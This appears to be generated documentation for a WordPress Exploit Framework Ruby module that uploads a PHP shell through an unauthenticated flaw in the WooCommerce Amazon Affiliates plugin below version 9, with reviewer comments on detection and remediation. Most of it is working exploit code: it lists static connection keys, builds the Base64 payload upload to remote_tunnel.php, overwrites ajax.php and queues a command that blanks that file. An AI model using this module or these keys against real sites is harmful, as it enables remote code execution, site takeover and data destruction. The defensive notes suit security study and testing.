class Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 6
# Sets up the module: runs the Wpxf::WordPress::ShellUpload initializer, then
# records the module metadata and declares the single required option.
#
# Reviewer note: the description says the plugin's connection keys are
# statically defined, so knowledge of a key is not specific to one site. The
# module name scopes the issue to plugin versions below 9, which makes
# upgrading the plugin the relevant remediation.
def initialize
  super

  # Reproduced exactly, leading whitespace included, because
  # desc_preformatted is set to true below.
  description = %(
      This module exploits a file upload vulnerability which allows users
      to upload and execute PHP scripts in the context of the web server.

      In order to use this module, a valid connection key must be provided.
      These are statically defined keys, that have been changed on a number
      of occasions.

      Some of the keys that have been identified are:
       - 1ec4614ce9b023d2a58deef6dcabb6ab
       - c125a47cba1e8ec73945dd622d142f79
       - 69efc4922575861f31125878597e97cf
       - 501d0292aca8270d539662a5a9aad855
    )

  credits = [
    'Evex_1337', # Discovery and disclosure
    'rastating'  # WPXF module
  ]

  update_info(
    name: 'WooCommerce Amazon Affiliates < v9 Unauthenticated Shell Upload',
    desc: description,
    author: credits,
    references: [%w[WPVDB 7940]],
    date: 'Apr 25 2015',
    desc_preformatted: true
  )

  # The key is mandatory; it is later placed in the request body by
  # payload_body_builder.
  key_option = StringOption.new(
    name: 'connection_key',
    desc: 'The plugin connection key, see module description for static keys',
    required: true
  )
  register_option(key_option)
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 51
# Determines the installed plugin version from the changelog shipped in the
# plugin directory and hands it to check_version_from_custom_file.
#
# The third argument, '9', is presumably the first fixed version (the module
# name reads "< v9") -- confirm against check_version_from_custom_file.
#
# NOTE(review): every version component in the pattern is a single digit, so
# a changelog heading such as "## [8.10]" or "## [10.0]" does not match; how
# a non-match is reported depends on the helper, which is not shown here.
# NOTE(review): this only works while changelog.txt is readable over HTTP, so
# blocking direct access to plugin text files removes this version disclosure.
def check
  version_heading = /##\s\[(\d\.\d(\.\d)*)\]/
  changelog_url = normalize_uri(wordpress_url_plugins, 'woozone', 'changelog.txt')
  check_version_from_custom_file(changelog_url, version_heading, '9')
end
emit_usage_info()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 45
# Emits a single warning telling the operator that the plugin's own ajax.php
# under woozone/modules/remote_support does not survive a run of this module.
#
# NOTE(review): for defenders this means an unexpected change to that file's
# content is an integrity-monitoring signal for this issue.
def emit_usage_info
  # Joined with single spaces so the emitted text is one continuous sentence run.
  warning_text = [
    'When executing this module, the ajax.php file in woozone/modules/remote_support will be deleted.',
    'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if',
    'the selected payload is unable to re-create it automatically.'
  ].join(' ')

  emit_warning warning_text
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 60
# Assembles the form fields for the upload request and returns the populated
# Utility::BodyBuilder. Fields are added in a fixed order: the operator's
# connection key, the 'save_file' action, the target file name and the
# strict Base64 encoding of the payload.
#
# NOTE(review): the request is presumably sent to uploader_url by the
# ShellUpload superclass -- confirm there.
# NOTE(review): a request to that endpoint carrying action=save_file together
# with a Base64 file_content field is the shape a WAF or log rule can key on.
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('connection_key', datastore['connection_key'])
    form.add_field('action', 'save_file')
    form.add_field('file', 'ajax.php')
    # strict_encode64 emits no line breaks.
    form.add_field('file_content', Base64.strict_encode64(payload.encoded))
  end
end
run()
Calls superclass method Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 77
# Queues one shell command on the payload, then defers to
# Wpxf::WordPress::ShellUpload#run for the rest of the run.
#
# The queued command redirects an empty echo into ajax.php, replacing that
# file's content with a single blank line. It is queued before super is
# called; when it actually executes depends on the payload and superclass,
# which are not shown here.
def run
  blank_out_command = 'echo "" > ajax.php'
  payload.enqueue_command(blank_out_command)
  super
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 69
# Returns the URL of ajax.php inside the plugin's remote_support module
# directory, built from the site's plugins URL. This is the same file name
# that payload_body_builder sends in its 'file' field.
def uploaded_payload_location
  path_segments = %w[woozone modules remote_support ajax.php]
  normalize_uri(wordpress_url_plugins, *path_segments)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 56
# Returns the URL of remote_tunnel.php inside the plugin's remote_support
# module directory, built from the site's plugins URL.
#
# NOTE(review): requests to this path are the access-log indicator for this
# issue; restricting direct access to it is a stop-gap until the plugin is
# upgraded.
def uploader_url
  path_segments = %w[woozone modules remote_support remote_tunnel.php]
  normalize_uri(wordpress_url_plugins, *path_segments)
end
validate_upload_result()
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 73
# Returns true when the upload response body does not contain the text
# "Invalid key!" (case-insensitive, any single whitespace character between
# the two words), and false when it does.
#
# NOTE(review): this is the only condition checked, so any other response
# (an error page, a block page from a filter in front of the site) also
# yields true; a true result alone does not show the upload was accepted.
def validate_upload_result
  rejection_marker = /Invalid\skey!/i
  # =~ gives nil when there is no match, which is the "not rejected" case.
  (upload_result.body =~ rejection_marker).nil?
end